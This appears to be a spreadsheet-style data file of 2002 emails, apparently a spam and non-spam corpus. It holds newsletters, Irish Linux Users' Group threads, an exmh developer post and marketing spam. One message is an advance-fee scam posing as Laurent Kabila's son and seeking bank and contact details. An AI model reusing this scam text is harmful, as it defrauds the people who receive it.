 &lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;
 &lt;p&gt;
 Before directing Catch-22 and The Graduate, Mike Nichols made his big screen debut directing this adroit adaptation of Edward Albee's play "Who's afraid of Virginia Woolf?"  Nominated for thirteen, and winner of five, Academy Awards, this dark tale centers on history professor George (Richard Burton), and his wife Martha (Elizabeth Taylor), daughter of the college president.  At first George and Martha appear to be the average Ozzie and Harriet, an aging, well-adjusted, educated couple, comfortable with their lives and their love.  George and Martha quickly shatter this illusion, as they return from a faculty cocktail party, to exchange a caustic barrage of verbal barbs.  Just as quickly, however, the couple turns witty and civil when the young new biology professor Nick (George Segal) and his shy, but pretty wife Honey (Sandy Dennis) stop by for a nightcap. Unfortunately for Nick and Honey, the sardonic exchange does not disappear, it merely changed guise.  Soon Nick and Honey find themselves helpless pawns in the elder couple's sick-witted exchange.  Throughout the remainder of the movie, George and Martha dance their finely choreographed, oft-rehearsed dance of despise. The two alternate the lead, alternately dishing out and enabling the abuse, but they never miss a step.  Thankfully, writer Albee's sublime play translates to the big screen almost unadulterated. Taylor and Burton deliver his lines with great force and impeccable timing.  At one point George proposes "Now that we're through with Humiliate the Host...and we don't want to play Hump the Hostess yet...how about a little round of Get the Guests?"  This provides some idea of the precarious twist of uncomfortable wit that drives the action from start to finish. Albee's stellar writing notwithstanding, the real star of this film is Taylor and Burton's alchemy, converting Albee's words into cinematic gold.  Ok, I will grant you that playing a pair of aging, drunk, selfish lovers may not have been much of a stretch.  Both actors, however, deliver their lines with the chilling reality of a serial killer describing his most gratifying slaying.  Often unpleasant and disturbing, this film never allows you to relax or look away.   Simultaneously seamlessly smooth, and ingeniously rocky this is not a "feel good" movie. "Who's Afraid of Virginia Woolf?" is, however, a memorable film that will stick with you for years to come.
 &lt;ul&gt;
 &lt;li&gt;Region 1 Encoding (US and Canada only)
 &lt;li&gt;Format: Black and White, Widescreen Anamorphic, Closed Captioned
 &lt;li&gt;Sound: (Dolby Digital 5.1)
 &lt;li&gt;Production Notes
 &lt;/ul&gt;
 &lt;p class="url" align="right"&gt;Review by &lt;a href="mailto:brett@lockergnome.com?subject=DVD Review Feedback"&gt;Brett Trout&lt;/a&gt;
 &lt;!-- WALLPAPER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeWALLPAPER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- http://www.deviantart.com/output/lockergnome_newsletter-skin.html --&gt;
 &lt;!-- Begin Featured Skin --&gt;
 &lt;span class="author"&gt;&lt;b&gt;purple flower for &lt;a title="WallPapers Website" target=_blank HREF="http://www.wincustomize.com" &gt;WallPapers&lt;/a&gt;&lt;/b&gt; by tatosh&lt;/span&gt;&lt;br&gt;
 &lt;img height=6 src="/images/blank.gif" width=1&gt;
 &lt;font size="1"&gt;Posted on 7/17/2002 12:35:01 AM  -- &amp;nbsp;&amp;nbsp; &lt;/font&gt;
 &lt;p align="center"&gt;&lt;center&gt;
 &lt;img BORDER=0 SRC="http://www.wincustomize.com/library/accounts/tatosh/wallpapers/tpurpleflower.jpg" ALT="purple flower by tatosh" HEIGHT=240 WIDTH=320&gt;&lt;/center&gt;
 &lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;
 &lt;font size="2"&gt;
 [&lt;a title="Download purple flower" HREF="http://www.wincustomize.com/skins.asp?flags=skinid=3984|library=8|file=purpleflower.zip" &gt;Download&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="View Large Image"  target=_blank HREF="http://www.wincustomize.com/library/accounts/tatosh/wallpapers/purpleflower.jpg" &gt;Zoom&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="Visit WinCustomize" target=_blank HREF="http://www.wincustomize.com/skins.asp?library=8&amp;SkinID=3984" &gt;Visit WinCustomize&lt;/a&gt;]
 &lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;!-- End Featured Skin --&gt;
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table bgcolor="#A9C4CF" cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020717.html"&gt;http://www.lockergnome.com/issues/digitalmedia/20020717.html&lt;/a&gt;&lt;br&gt;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HREF="http://www.gnomedex.com/"&gt;Geekathon 2002&lt;/A&gt;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HREF="http://lockergnome.pricegrabber.com/"&gt;The GnomeSHOPPER&lt;/A&gt;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&amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Recommend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href="http://www.lockergnome.com/submit.html"&gt;Submit Your Opinion&lt;/a&gt;&lt;br&gt;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HREF="http://www.amazon.com/exec/obidos/ASIN/0966103254/ref=ase_lockergnome/"&gt;Get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href="mailto:jake@lockergnome.com?subject=Lockergnome Digital Media Comment"&gt;E-mail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&lt;p&gt;&lt;br&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;table border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.lockergnome.com/webcam.html"&gt;
 &lt;img width="125" height="94" alt="Lockergnome Webcam Image" src="http://www.lockergnome.com/images/webcam/jakecam.jpg"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;font size="1" face="Tahoma,Arial"&gt;CLICK HERE TO ZOOM&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/font&gt;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class="sidebar"&gt;GNOMEMUSIC&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;table border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.netmusiccountdown.com"&gt;
 &lt;img border="0" alt="Net Music Countdown" src="http://images.lockergnome.com/images/nmclogo.gif"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;p&gt;&lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1y22co"
 target=_blank&gt;&lt;b&gt;Coldplay Takes a Bigger Bite&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 If you miss Coldplay's quick little club tour this August, don't worry, youll get a second chance to see them in...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1d42da"
 target=_blank&gt;&lt;b&gt;Dave Matthews Gives Us 'Busted Stuff'&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 The Dave Matthews Band is breaking things up with their new album Busted Stuff; it hit stores shelves yesterday. The...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1r28we"
 target=_blank&gt;&lt;b&gt;Strokes Leave Weezer Hanging&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Strokes fans who are heading to the Weezer tour to catch the Strokes opening will be disappointed. The Strokes were...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1z23ja"
 target=_blank&gt;&lt;b&gt;Jaz-O Sez Jay-Z is a Fraud&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 The rap between rappers Jaz-O and Jay-Z is nothin but diss...otherwise known as a falling out. Jaz-O was Jay-Z's...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1h24aa"
 target=_blank&gt;&lt;b&gt;Booze, Drugs in Aaliyah's Pilot&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 The pilot who was at the controls of a small plane that crashed and killed singer and actress Aaliyah had cocaine...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1w27ti"
 target=_blank&gt;&lt;b&gt;McGraw's Uncle Charged With Murder&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Country singer Tim McGraw's uncle has been charged with shooting and killing a neighbor in Vallejo, California. One... 
 &lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#FFEEDD"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;GNOMECREDITS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;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&lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;Search Past Issues:&lt;br&gt;
 &lt;img src="http://images.lockergnome.com/images/blank.gif"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
 &lt;center&gt;&lt;a href="http://www.gnomedex.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/gnomedex_vert.gif" width="125" height="400" border="0"&gt;&lt;/a&gt;&lt;/center&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Terry Ryan/Chesco is out of the office.
</t>
  </si>
  <si>
    <t xml:space="preserve">I will be out of the office starting  07/20/2002 and will not return until
 07/29/2002.
 I will respond to your message when I return. If there is an immediate need
 to contact a CCIS representative, you can call our office at 610-518-5700.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</si>
  <si>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Re: [ILUG] Checking that cronjobs actually ran?
</t>
  </si>
  <si>
    <t xml:space="preserve">Wynne, Conor's [conor_wynne@maxtor.com] 16 lines of wisdom included:
 &gt; Hi ladies,
 &gt; 
 &gt; I setup a cron job to do a full backup to tape drive there last night, but
 &gt; I'm just wondering how I can verify that it actually ran? 
 &gt; I suppose that a mail will be sent to root as I ran crontab -e as root. Is
 &gt; that correct or should I be looking elsewhere?
 &gt; 
 &gt; Thanks to everyone who replies in advance. 
 Where does cron log to? (check /etc/syslog.conf) 
 Usually it's something like /var/log/cron.log or /var/log/cron 
 Anyways have a look in the logs, make sure your backup ran (so long
 as there weren't any errors).
 Typically if there's any output from the commands you've run,
 they're mailed to you.
 -- 
   Philip Reynolds        
    RFC Networks          tel: 01 8832063
 www.rfc-networks.ie      fax: 01 8832041
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] eircom mail
</t>
  </si>
  <si>
    <t xml:space="preserve">hi i was just wondering if anyone experiening difficulty with eircom mail
 sever.I was trying to send mail from mozilla mail but it keeps coming up
 with this error:
 sorry,that domain isnt in my list of allows rcpthosts(#5.7.1)
 please check the message recipients and try again.
 What is this all about.
 I am using mail2.eircom.net as my smtp and my pop, i can recieve mail but
 i cannot send mail. is there any other open relay that i  can use.
 nils
 Also i was just browsing the web and came across this
 http://www.microsoft.com/ireland/security/info2.htm
 Its a seminar on
 &lt;cough&gt;security and reliable&lt;/cough&gt;
 maybe ilug should go along and hold a seminar on the same day right
 across the hall from this!
 nils
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Aug 10, 2002 at 12:11:50PM +0100, FRLinux mentioned:
 &gt; I have been using 2.4.19 since a couple of days on a Mandrake 8.2 with
 &gt; standard RPMs for cdrecord and it didn't give any hard locks on it at
 &gt; all, i've already burnt a couple of CDs.
  Stephane, don't you have a SCSI CD burner though ?
 John 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve"> REQUEST FOR URGENT BUSINESS ASSISTANCE
 --------------------------------------
 Your contact was availed to me by the chamber of
 commerce. It was given  to me because of my diplomatic 
 status as I did not disclose the actual reasons for 
 which I sought your contact. But I was
 assured That you are reputable and trustworthy if you
 will be of assistance. 
 I am Laurent Mpeti Kabila (Jnr) the second son of
 Late President LAURENT DESIRE KABILA the immediate
 Past president of the DEMOCRATIC REPUBLIC OF CONGO in
 Africa who was murdered by his opposition through his 
 personal bodyguards in his bedroom on Tuesday 16th January, 2001.
 I have the privilege of being mandated by my father colleagues 
 to seek your immediate and urgent co-operation to receive into
 your bank account the sum of US $25m.(twenty-five million Dollars)
 and some thousands carats of Diamond. 
 This money and treasures was lodged in a vault with a
 security firm in Europe and South-Africa.
 SOURCES OF DIAMONDS AND FUND
 In August 2000, my father as a defence minister and president has a 
 meeting with his cabinet and armychief about the defence budget for
 2000 to 2001 which was US $700m. so he directed one of his best
 friend. Frederic Kibasa Maliba who was a minister of
 mines and a political party leader known as the Union Sacree de, 
 I_x0011_ opposition radicale et ses allies (USORAL) to buy arms
 with US $200m on 5th January 2001; for him to finalized the arm_x0012_s
 deal,
 my father was murdered. f.K. Maliba (FKM) and I have decided to keep
 the money with a foreigner after which he will use it to contest for
 the political election. Inspite of all this we have resolved to
 present your or your company for the firm to pay it into your
 nominated 
 account the above sum and diamonds. This transaction should be
 finalized within
 seven (7) working days and for your co-operation and partnership, we
 have unanimously agreed that you will be entitled to 5.5% of the money
 when successfully receive it in your account. The nature of your
 business is not relevant to the successful execution of this
 transaction what we
 require is your total co-operation and commitment to ensure 100%
 risk-free transaction at both ends and to protect the persons
 involved in this
 transaction, strict confidence and utmost secrecy is required
 even after the successful conclusion of this transaction. If this
 proposal is acceptable to you, kindly provide me with your personal
 telephone
 and fax through my E-mail box for immediate commencement of the
 transaction. 
 All correspondence is for the attention of my counsel:joseph edward.
 I count on your honour to keep my secret, SECRET.
 Looking forward for your urgent reply
 Thanks.
 Best Regards
 MPETI L. KABILA (Jnr)
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_927886807P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt;
 &gt; Date:  Mon, 26 Aug 2002 20:00:36 +0200
 &gt;
 &gt; 
 &gt; lately I've got the feeling that exmh is getting slower and slower. I 
 &gt; just decided to check that vs. reality, and yes, speed has left the 
 &gt; scene somewhere between the release of 2.5 and now.
 &gt; 
 &gt; I checked on a number of small messages in a big folder (~10000 
 &gt; msgs). The delay of the Next button has increased considerably:
 &gt; 
 &gt; 2.5-release: 350-450 msec
 &gt; latest cvs: 1000-12000 msec
 &gt; 
 &gt; Frankly I think this is getting close to non-acceptable since the 
 &gt; user settings hasn't changed.
 &gt; 
 &gt; Anybody have any ideas where performance disappeared?
 Here's a fix that I think will make a real difference.
 Ftoc_ShowSequences needs to be able to be called with an optional list of msgids 
 to update and if it's called that way it only removes or adds tags for those 
 messages.  Then in places like MsgChange, we only update the messages which have
 changed.
 Also, a separate Ftoc_ShowSequence function which only updates the display of 
 one sequence should be written which also takes an optional list of msgids.  
 In a place like MsgChange, it would only need to update the cur sequence.
 If nobody else gets to it, I'll do this when I get back.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_927886807P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9bPUlK9b4h5R0IUIRAqCdAJkBYATj6wLY6RM/EPECD3yGkXMXVgCcDADM
 4n+q/8HdvWmkRlGJn3lUb1M=
 =Rd2E
 -----END PGP SIGNATURE-----
 --==_Exmh_927886807P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Low Cost Easy to Use Conferencing
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Lowest Rate Services&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#000033 leftMargin=3D0&gt;&lt;FON=
 T 
 face=3Darial,helvetica&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D600 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#999999 size=3D6&gt;Conferencing Made=
  Easy&lt;/FONT&gt;&lt;BR&gt;
 &lt;FONT color=3D#999999 size=3D5&gt;Only &lt;U&gt;18 Cents&lt;/U&gt; Per Minute!&lt;/B&gt;&lt;/FONT&gt;=
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#ff0000 size=3D5&gt;&lt;B&gt;(Including Long Distance!)&lt;/B&gt;&lt;/FONT&gt;=
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;FONT color=3D#999999 size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;No setup fees 
       &lt;LI&gt;No contracts or monthly fees 
       &lt;LI&gt;Call anytime, from anywhere, to anywhere 
       &lt;LI&gt;Connects up to 100 Participants 
       &lt;LI&gt;Simplicity in set up and administration 
       &lt;LI&gt;Operator Help available 24/7 &lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;=
 /TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#ff0000 size=3D60&gt;&lt;B&gt;&lt;FONT size=3D5&gt;T=
 he Highest Quality Service For The Lowest Rate In The Industry!&lt;/B&gt;&lt;/FONT&gt;=
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D400 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#999999 size=3D4&gt;Fill out the form be=
 low to find out how you can lower your phone bill every month.&lt;/FONT&gt;&lt;/TD&gt;=
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#999999 size=3D2&gt;Required Input Field&lt;FONT color=3D#ff000=
 0 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:aud.conf@marketing401.com?subject=3DAudioc_Inq=
 uiry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999
           size=3D2&gt;Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;Web 
             Address&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;Company 
             Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;
             State&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;Business 
             Phone&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;Home 
             Phone&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;Email 
             Address&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#999999 size=3D2=
 &gt;Type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face=3D"Arial, Helvetica, sans-serif" color=3D=
 #999999 
       size=3D1&gt;To be removed from our distribution lists, please  
       &lt;FONT color=3D#666666&gt;&lt;A href=3D"mailto:delete@marketing401.com?subj=
 ect=3DRemove_Conferencing"&gt;Click 
       here&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY=
 &gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Wrox Press Developer's Journal
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------Multipart-Boundary-xx5UNseljF43o---
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 ***WROX PRESS DEVELOPER'S JOURNAL***
 Programmer to Programmer(TM)
 http://www.wrox.com/?tid026
 7/26/02
 ==========
 IN THIS ISSUE
 ==========
 TITLE OF THE MONTH
 GEMS FROM THE CATALOGUE
 RECENTLY RELEASED
 FUTURE TITLES
 NEWS &amp; FEATURES
 WROX ANNOUNCEMENTS
 OTHER ANNOUNCEMENTS
 INFORMATION FOR SUBSCRIBERS
 ==========
 TITLE OF THE MONTH
 ==========
 ASP.NET Namespace Reference with C#
 http://www.wrox.com/ACON11.asp?ISBN=1861007442&amp;tid026
 Introduction
 System.Web
 System.Web.UI
 System.Web.UI.HtmlControls
 System.Web.UI.WebControls
 System.Web.UI.MobileControls
 System.Web.Caching
 System.Web.Configuration
 System.Web.Security
 System.Web.Services
 System.Web.Services.Description
 System.Web.Services.Protocols
 Data in ASP.NET
 XML in ASP.NET 
 Also available:
 ASP.NET 1.0 Namespace Reference with VB.NET
 http://www.wrox.com/ACON11.asp?ISBN=1861007450&amp;tid026
 ==========
 GEMS FROM THE CATALOGUE
 ==========
 Professional Linux Programming
 http://www.wrox.com/ACON11.asp?ISBN=1861003013&amp;tid026
 Introduction
 Chapter 1: Application Design
 Chapter 2: Concurrent Versions System (CVS)
 Chapter 3: Databases
 Chapter 4: PostgreSQL interfacing
 Chapter 5: MySQL
 Chapter 6: Tackling Bugs
 Chapter 7: LDAP Directory Services
 Chapter 8: GUI programming with GNOME/GTK+
 Chapter 9: GUI Building with Glade and GTK+/GNOME
 Chapter 10: Flex and Bison
 Chapter 11: Testing Tools
 Chapter 12: Secure Programming
 Chapter 13: GUI programming with KDE/Qt
 Chapter 14: Writing the dvdstore GUI using KDE/Qt
 Chapter 15: Python
 Chapter 16: Creating Web interfaces with PHP
 Chapter 17: Embedding and extending Python with C/C++
 Chapter 18: Remote Procedure Calls
 Chapter 19: Multi-media and Linux
 Chapter 20: CORBA.
 Chapter 21: Implementing CORBA with ORBit
 Chapter 22: Diskless systems
 Chapter 23: XML and libxml
 Chapter 24: Beowulf Clusters
 Chapter 25: Documentation
 Chapter 26: Device Drivers
 Chapter 27: Distributing the application
 Chapter 28: Internationalization
 ==========
 RECENTLY RELEASED
 ==========
 ASP.NET Namespace Reference with C#
 http://www.wrox.com/ACON11.asp?ISBN=1861007442&amp;tid026
 ASP.NET Namespace Reference with VB.NET
 http://www.wrox.com/ACON11.asp?ISBN=1861007450&amp;tid026
 Beginning ASP.NET Databases using C#
 http://www.wrox.com/ACON11.asp?ISBN=1861007418&amp;tid026
 Beginning C# Databases
 http://www.wrox.com/ACON11.asp?ISBN=1861006098&amp;tid026
 ***Visit the P2P Discussion list for Beginning C# Databases
 http://p2p.wrox.com/list.asp?list=beginning_c_sharp_databases&amp;tid026
 Developing C# Windows Software: A Windows Forms Tutorial
 http://www.wrox.com/ACON11.asp?ISBN=186100737x&amp;tid026
 Professional ASP.NET XML using C#
 http://www.wrox.com/ACON11.asp?ISBN=1861007248&amp;tid026
 Professional Open Source Web Services
 http://www.wrox.com/ACON11.asp?ISBN=1861007469&amp;tid026
 Visual Basic .NET Solutions Toolkit: Practical Classes for .NET Developers
 http://www.wrox.com/ACON11.asp?ISBN=1861007396&amp;tid026
 ==========
 FUTURE TITLES
 ==========
 Beginning VB.NET 2nd Edition
 http://www.wrox.com/ACON11.asp?ISBN=1861007612&amp;tid026
 Beginning .NET Web Services with VB.NET
 http://www.wrox.com/ACON11.asp?ISBN=1861007256&amp;tid026
 Professional VB.NET Design Patterns
 http://www.wrox.com/ACON11.asp?ISBN=1861006985&amp;tid026
 Fast Track ADO.NET
 http://www.wrox.com/ACON11.asp?ISBN=1861007604&amp;tid026
 ASP.NET Security
 http://www.wrox.com/ACON11.asp?ISBN=1861006209&amp;tid026
 ***Visit the P2P Discussion list for ASP.NET Security
 http://p2p.wrox.com/list.asp?list=aspx_security&amp;tid026
 Fast Track Windows Forms
 http://www.wrox.com/ACON11.asp?ISBN=1861007663&amp;tid026
 Professional ASP.NET Web Services with VB.NET
 http://www.wrox.com/ACON11.asp?ISBN=1861007752&amp;tid026
 VB.NET Code Level Security Handbook
 http://www.wrox.com/ACON11.asp?ISBN=1861007477&amp;tid026
 VB.NET Remoting Handbook
 http://www.wrox.com/ACON11.asp?ISBN=186100740x&amp;tid026
 VB.NET Deployment Handbook
 http://www.wrox.com/ACON11.asp?ISBN=186100771x&amp;tid026
 ==========
 NEWS &amp; FEATURES 
 ==========
 ASPToday announces their Inaugural Guru week
 ***Dan Wahlin expounds on XML Support in ASP.NET
 ASPToday are proud to announce their first Guru Week. From 29th July to
 2nd August Microsoft MVP, ASPToday author and www.xmlforasp.net/ founder
 Dan Wahlin presents a series of specially commissioned articles, telling
 you all you need to know about XML support in ASP.NET. Drawing on his
 experience of consulting and XML training, Dan's articles will allow
 anyone interested in XML to quickly get up to speed in this important
 subject.
 Read more about ASPToday's Guru Weeks:
 http://www.wrox.com/ACON7.asp?art_type=1&amp;id=809&amp;tid026
 ***Updating Data Safely with A DataSet, by Alex Homer
 OK, so we cant store all three values for a row (the current, original
 and the underlying values) in the tables of our DataSet. Is this actually
 important? What do we actually need to perform the process, and what do
 users actually expect to see? Can we make do with just two values instead
 of three, (and dont you hate books that keep asking questions)?
 Read the rest of Alex Homer's article here:
 http://www.wrox.com/ACON7.asp?art_type=1&amp;id=810&amp;tid026
 ==========
